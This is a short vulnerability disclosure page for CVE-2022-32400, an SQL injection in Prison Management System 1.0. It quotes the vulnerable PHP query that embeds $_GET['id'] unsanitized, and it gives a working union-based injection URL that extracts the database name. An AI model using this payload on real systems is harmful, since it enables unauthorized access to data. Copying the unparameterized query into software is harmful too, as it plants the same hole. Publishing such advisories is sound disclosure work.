Skip to content

Latest commit

 

History

History
20 lines (18 loc) · 763 Bytes

cve-2022-32400.md

File metadata and controls

20 lines (18 loc) · 763 Bytes

CVE-2022-32400

Info

Prison Management System 1.0 - SQL Injection

[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/user/manage_user.php:4

$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");

PoC

  • Payload :
# Union Based
http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23
  • http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23 True